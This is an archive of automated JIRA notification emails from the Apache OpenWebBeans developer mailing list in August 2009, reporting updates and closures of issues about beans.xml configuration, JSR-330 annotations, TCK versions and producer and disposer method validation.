brutus.apache.org (Postfix) with ESMTP id 16182234C046 for <[email protected]>; Sat, 29 Aug 2009 15:57:33 -0700 (PDT) Message-ID: <968872543.1251586653089.JavaMail.jira@brutus> Date: Sat, 29 Aug 2009 15:57:33 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-126) remove old rules and formattings for handling of beans.xml In-Reply-To: <1420435456.1249163774805.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-126?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-126. ------------------------------ Resolution: Fixed Fix Version/s: (was: M3) M4 Now we have two types of XML configuration. OWB Specific and spec. defined. > remove old rules and formattings for handling of beans.xml > ---------------------------------------------------------- > > Key: OWB-126 > URL: https://issues.apache.org/jira/browse/OWB-126 > Project: OpenWebBeans > Issue Type: Bug > Affects Versions: M2 > Reporter: Mark Struberg > Assignee: Mark Struberg > Fix For: M4 > > > In the 'old' spec version, the XML based configuration was defined down to a very detailed level. > Since then the spec has been changed heavily and now doesn't say much about XML configuration in general. There is no explicit XML section and beans.xml is only mentioned a few times: > 1. policies > {noformat} > <beans> > <policies> > <class>org.mycompany.mock.MockAsynchronousService</class> > <stereotype>org.mycompany.myfwk.Mock</stereotype> > <stereotype>org.mycompany.site.Australian</stereotype> > </policies> > </beans> > {noformat} > 2. decorators > {noformat} > <beans> > <decorators> > <class>org.mycompany.myfwk.TimestampLogger</class> > <class>org.mycompany.myfwk.IdentityLogger</class> > </decorators> > </beans> > {noformat} > 3. interceptors > {noformat} > <beans> > <interceptors> > <class>org.mycompany.myfwk.TransactionInterceptor</class> > <class>org.mycompany.myfwk.LoggingInterceptor</class> > </interceptors> > </beans> > {noformat} > There is obviously no forced namespace anymore, which currently breaks most of the TCK tests. > But I expect a lot more things need to be rewritten. > My personal opinion is that we should _not_ remove the whole XML configuration stuff which we already have. It is not in the spec anymore, but it is a feature one needs in praxis. Anyway it has no high priority and we have to find our own syntax until a homogenic XML configuration will be aggreed upon in the next webbeans spec. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Aug 29 22:58:00 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41377 invoked from network); 29 Aug 2009 22:58:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2009 22:58:00 -0000 Received: (qmail 30418 invoked by uid 500); 29 Aug 2009 22:58:00 -0000 Delivered-To: [email protected] Received: (qmail 30384 invoked by uid 500); 29 Aug 2009 22:58:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30368 invoked by uid 99); 29 Aug 2009 22:58:00 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:58:00 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:57:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B4490234C004 for <[email protected]>; Sat, 29 Aug 2009 15:57:32 -0700 (PDT) Message-ID: <2131211456.1251586652719.JavaMail.jira@brutus> Date: Sat, 29 Aug 2009 15:57:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-122) use the latest TCK suite for webbeans-tck In-Reply-To: <1446384139.1248118934804.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-122?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-122: ------------------------------- Fix Version/s: (was: M3) M4 Fixed to M4. > use the latest TCK suite for webbeans-tck > ----------------------------------------- > > Key: OWB-122 > URL: https://issues.apache.org/jira/browse/OWB-122 > Project: OpenWebBeans > Issue Type: Bug > Affects Versions: M2 > Reporter: Mark Struberg > Assignee: Mark Struberg > Fix For: M4 > > > For the webbeans-tck module we currently have a dependency to the jboss jsr299 TCK version 1.0.0.BETA2. > Since this still refers to the 'old' package convention (e.g. javax.inject instead javax.enterprise.inject, etc), we should go back to use the latest SNAPSHOT from the JBoss SVN for our webbeans-tck, as we did before. > > This way we could for now delete all the old and then unused interfaces like javax.inject.Obtains etc. > We should switch to the next release of the TCK suite once it is public.d -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Aug 29 22:59:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41480 invoked from network); 29 Aug 2009 22:59:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Aug 2009 22:59:56 -0000 Received: (qmail 30547 invoked by uid 500); 29 Aug 2009 22:59:56 -0000 Delivered-To: [email protected] Received: (qmail 30526 invoked by uid 500); 29 Aug 2009 22:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30516 invoked by uid 99); 29 Aug 2009 22:59:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:59:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 29 Aug 2009 22:59:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B2100234C004 for <[email protected]>; Sat, 29 Aug 2009 15:59:32 -0700 (PDT) Message-ID: <1433404880.1251586772707.JavaMail.jira@brutus> Date: Sat, 29 Aug 2009 15:59:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-100) Update for Disposal Methods In-Reply-To: <1542542549.1245444127530.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-100?page=3Dcom.atlassian.j= ira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-100. ------------------------------ Resolution: Fixed Fix Version/s: (was: M3) M4 > Update for Disposal Methods > --------------------------- > > Key: OWB-100 > URL: https://issues.apache.org/jira/browse/OWB-100 > Project: OpenWebBeans > Issue Type: Improvement > Components: Core > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M4 > > > The disposer method must be declared by the same bean class as the produc= er method. > Disposer methods are defined in the class DefinitionUtil #=C2=A0defineDis= posalMethods. Update validation logic here. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 14:49:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91104 invoked from network); 30 Aug 2009 14:49:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 14:49:54 -0000 Received: (qmail 12891 invoked by uid 500); 30 Aug 2009 14:49:54 -0000 Delivered-To: [email protected] Received: (qmail 12839 invoked by uid 500); 30 Aug 2009 14:49:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12815 invoked by uid 99); 30 Aug 2009 14:49:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:49:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:49:52 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D2AD0234C044 for <[email protected]>; Sun, 30 Aug 2009 07:49:32 -0700 (PDT) Message-ID: <1616388149.1251643772861.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 07:49:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (OWB-131) integrate new JSR-330 annotations within OWB In-Reply-To: <80121743.1250806874998.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-131?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu closed OWB-131. ------------------------------ Resolution: Fixed > integrate new JSR-330 annotations within OWB > -------------------------------------------- > > Key: OWB-131 > URL: https://issues.apache.org/jira/browse/OWB-131 > Project: OpenWebBeans > Issue Type: New Feature > Components: Core > Affects Versions: M2 > Reporter: Mark Struberg > Assignee: Mark Struberg > Fix For: M3 > > > The JSR-330 annotations from the new spec are replacing functionality from a few now obsolete annotations: > @Current -> @Inject > @BindingType -> @Qualifier > @ScopeType -> @Scope + @NormalScope (javax.inject.Scope doesn't have the 'normal' and 'passivating' attributes) This is now unclear btw... > @Singleton will be a new Scope -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 14:49:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91105 invoked from network); 30 Aug 2009 14:49:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 14:49:54 -0000 Received: (qmail 12903 invoked by uid 500); 30 Aug 2009 14:49:54 -0000 Delivered-To: [email protected] Received: (qmail 12841 invoked by uid 500); 30 Aug 2009 14:49:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12819 invoked by uid 99); 30 Aug 2009 14:49:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:49:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:49:52 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id DF67B234C052 for <[email protected]>; Sun, 30 Aug 2009 07:49:32 -0700 (PDT) Message-ID: <1671493903.1251643772914.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 07:49:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-99) Interceptors and decorators may not declare producer methods. In-Reply-To: <64738061.1245444007811.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-99?page=3Dcom.atlassian.ji= ra.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-99: ------------------------------ Fix Version/s: (was: M3) M4 Fixed to M4 > Interceptors and decorators may not declare producer methods. > ------------------------------------------------------------- > > Key: OWB-99 > URL: https://issues.apache.org/jira/browse/OWB-99 > Project: OpenWebBeans > Issue Type: Improvement > Components: Interceptor and Decorators > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M4 > > > Interceptors and decorators may not declare producer methods. If an inter= ceptor or decorator has a method annotated > @Produces, the container automatically detects the problem and treats it = as a definition error, as defined in Section 12.4, > "Problems detected automatically by the container". > Decorators & =C4=B1nterceptors are configured in class WebBeansContainerD= eployer.=20 --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 14:51:55 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91275 invoked from network); 30 Aug 2009 14:51:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 14:51:54 -0000 Received: (qmail 13448 invoked by uid 500); 30 Aug 2009 14:51:54 -0000 Delivered-To: [email protected] Received: (qmail 13385 invoked by uid 500); 30 Aug 2009 14:51:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13364 invoked by uid 99); 30 Aug 2009 14:51:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:51:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:51:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B58A5234C004 for <[email protected]>; Sun, 30 Aug 2009 07:51:32 -0700 (PDT) Message-ID: <275885706.1251643892726.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 07:51:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-101) Update @New Binding Type for Taking Class Member Method In-Reply-To: <1594809625.1245444247362.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-101?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-101: ------------------------------- Fix Version/s: (was: M3) M4 Fixed to M4 > Update @New Binding Type for Taking Class Member Method > ------------------------------------------------------- > > Key: OWB-101 > URL: https://issues.apache.org/jira/browse/OWB-101 > Project: OpenWebBeans > Issue Type: Improvement > Components: Core > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M4 > > -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 14:51:55 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91274 invoked from network); 30 Aug 2009 14:51:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 14:51:54 -0000 Received: (qmail 13439 invoked by uid 500); 30 Aug 2009 14:51:54 -0000 Delivered-To: [email protected] Received: (qmail 13383 invoked by uid 500); 30 Aug 2009 14:51:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13363 invoked by uid 99); 30 Aug 2009 14:51:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:51:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:51:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C2C8A234C051 for <[email protected]>; Sun, 30 Aug 2009 07:51:32 -0700 (PDT) Message-ID: <972152843.1251643892796.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 07:51:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-102) Initializer Methods Validation for Generic Methods In-Reply-To: <1784320931.1245444367549.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-102?page=3Dcom.atlassian.j= ira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-102: ------------------------------- Fix Version/s: (was: M3) M4 Fixed to M4 > Initializer Methods Validation for Generic Methods > -------------------------------------------------- > > Key: OWB-102 > URL: https://issues.apache.org/jira/browse/OWB-102 > Project: OpenWebBeans > Issue Type: Improvement > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M4 > > > If a generic method of a bean is annotated @Initializer, the container au= tomatically detects the problem and treats it as a > definition error, as defined in Section 12.4, "Problems detected automati= cally by the container". > Currently initializer methods are defined in the class DefinitionUtil #= =C2=A0defineInjectedMethods. Update validation logic here. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 14:53:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91420 invoked from network); 30 Aug 2009 14:53:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 14:53:54 -0000 Received: (qmail 13652 invoked by uid 500); 30 Aug 2009 14:53:54 -0000 Delivered-To: [email protected] Received: (qmail 13619 invoked by uid 500); 30 Aug 2009 14:53:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13609 invoked by uid 99); 30 Aug 2009 14:53:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:53:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:53:52 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id CA16F234C051 for <[email protected]>; Sun, 30 Aug 2009 07:53:32 -0700 (PDT) Message-ID: <256121104.1251644012826.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 07:53:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-107) Check EL Name Ambigious In-Reply-To: <1445182445.1245496687711.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-107?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-107: ------------------------------- Fix Version/s: (was: M3) M4 Fixed to M4. > Check EL Name Ambigious > ----------------------- > > Key: OWB-107 > URL: https://issues.apache.org/jira/browse/OWB-107 > Project: OpenWebBeans > Issue Type: Task > Components: Injection and Lookup > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M4 > > > check section 5.4.1 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 14:53:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91424 invoked from network); 30 Aug 2009 14:53:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 14:53:56 -0000 Received: (qmail 13701 invoked by uid 500); 30 Aug 2009 14:53:56 -0000 Delivered-To: [email protected] Received: (qmail 13669 invoked by uid 500); 30 Aug 2009 14:53:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13659 invoked by uid 99); 30 Aug 2009 14:53:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:53:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:53:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B6F28234C004 for <[email protected]>; Sun, 30 Aug 2009 07:53:32 -0700 (PDT) Message-ID: <729427681.1251644012734.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 07:53:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-106) Update code for new deployment type handling. In-Reply-To: <1175238363.1245496327345.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-106?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-106: ------------------------------- Fix Version/s: (was: M3) M4 Fixed to M4. > Update code for new deployment type handling. > --------------------------------------------- > > Key: OWB-106 > URL: https://issues.apache.org/jira/browse/OWB-106 > Project: OpenWebBeans > Issue Type: Task > Components: Core > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M4 > > > Deployment types are removed from the specification. It affects lots of the code. I still want to support DeploymentType in OWB, because it is really beneficial. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 14:55:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91568 invoked from network); 30 Aug 2009 14:55:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 14:55:54 -0000 Received: (qmail 14071 invoked by uid 500); 30 Aug 2009 14:55:54 -0000 Delivered-To: [email protected] Received: (qmail 14037 invoked by uid 500); 30 Aug 2009 14:55:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14027 invoked by uid 99); 30 Aug 2009 14:55:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:55:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:55:52 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B7E27234C004 for <[email protected]>; Sun, 30 Aug 2009 07:55:32 -0700 (PDT) Message-ID: <950651968.1251644132739.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 07:55:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-103) Inconsistent Specialization Extra Check For Injection Points In-Reply-To: <1392119015.1245493927878.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-103?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-103: ------------------------------- Fix Version/s: (was: M3) M4 Fixed to M4. > Inconsistent Specialization Extra Check For Injection Points > ------------------------------------------------------------ > > Key: OWB-103 > URL: https://issues.apache.org/jira/browse/OWB-103 > Project: OpenWebBeans > Issue Type: Improvement > Components: Core > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M4 > > > Section 4.3.3 > Suppose an enabled bean X directly specializes a second bean Y. If either: > there is an injection point that matches Y and not X, according to the typesafe resolution algorithm defined in Sec- > tion 5.3, "Typesafe resolution", > Also DeploymentType precedence requirement has gone. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 30 14:55:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91572 invoked from network); 30 Aug 2009 14:55:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Aug 2009 14:55:54 -0000 Received: (qmail 14119 invoked by uid 500); 30 Aug 2009 14:55:54 -0000 Delivered-To: [email protected] Received: (qmail 14086 invoked by uid 500); 30 Aug 2009 14:55:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14076 invoked by uid 99); 30 Aug 2009 14:55:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:55:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 30 Aug 2009 14:55:53 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E8C6B234C051 for <[email protected]>; Sun, 30 Aug 2009 07:55:32 -0700 (PDT) Message-ID: <1152096394.1251644132952.JavaMail.jira@brutus> Date: Sun, 30 Aug 2009 07:55:32 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-104) Check Inherited Member for producer methods and fields In-Reply-To: <1129867611.1245494647408.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-104?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-104: ------------------------------- Fix Version/s: (was: M3) M4 Fixed to M4 > Check Inherited Member for producer methods and fields > ------------------------------------------------------ > > Key: OWB-104 > URL: https://issues.apache.org/jira/browse/OWB-104 > Project: OpenWebBeans > Issue Type: Improvement > Components: Core > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M4 > > > Producer method and producer field creation is define in class DefinitionUtil. -- This message is automatically generated 